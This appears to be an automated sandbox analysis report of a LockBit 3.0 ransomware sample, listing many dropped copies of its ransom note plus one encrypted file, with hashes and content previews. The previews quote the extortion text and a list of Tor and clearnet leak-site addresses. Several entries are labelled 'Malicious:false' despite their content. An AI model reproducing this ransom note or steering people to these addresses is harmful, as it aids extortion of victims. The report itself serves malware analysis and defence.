                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.978859761304226
                Encrypted:false
                SSDEEP:192:KWCbFn8qxkVwFR5oCl6rcoYFqXqreP3e9MMIDRcE1bZWPA6ho:J4vF3qooAeP3e9gDFZWPAh
                MD5:78808C2CE506F6F309B204A032D9D0A8
                SHA1:BD915CF9C0AECF59C92DB8A310E6EC564784FAD5
                SHA-256:44AC2A589E47089B3B8ADE0E2C3F6F38372472DA08FDB896E4636B20AF84D6F7
                SHA-512:0EB9D39A6FEF7A0BBD258E877402B55B0FDE2C94C1CCABFA42A126BBB5A1B91E1A8EC917770ECF7BC101550DBFFCA974EA7F01FEAB9E68F2C3B506D0F843D2FD
                Malicious:false
                Preview:/.....Q..u.+ef.....Z........gc.t.6...PPS...4p9Q.I.O.D......*..w!t.E...h.o...(]..,.K...g+;.....B...xR..Ke5T.\,.....Cq..7&.9.....l.....u..).rU...&.#sT.....5.a.EB.R:UL.u....mG..F....\=..._.Lv.....)...j.....4........5.....m..Z.0..N.q>.:$....W...............K.-.t}..GP.`Vr..anC2".ON.:..D=..{.0.9C2|.D...l..)....!.S&:X;..r*.,.n.OV.a....fB....u.< ...t...,%.r.o...v..7^...o..}w~.o.....0|..7'..c.....TG..j.....[...kE..-.0n.bB`Q..^$#..fH....).7..LXn<.*.....".9.B...i.._.V...g}......B. ]."....H...'.'..R..(bl.....Sa.o/~..k..z...)..4...~;E..h..z............$E..|.c..&....6.&........?....aA'..{.p.G..,EhC...g<.....#.g..L3...'.#.O..`.......C+....v..p.ME.x|..M..OKXS;.6+..y.....V..:.=.^...4.....r.R......t.Y.k..*..6.b...J8..-@.Od.y.z.&.F..:.+.S....l.V...a.sE......D.2...C..).3^.....[...*).b.g...Q..._..L....>.[..".~....:.<....).......Kt......E'.bc....!.....nY..=J.",.r..,13...~m.$..r1..........K..1.g.:5.s.._=`...q....2...f..(.D.bKM..Io9P...`.T.$.. ?..F.o.W.a

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
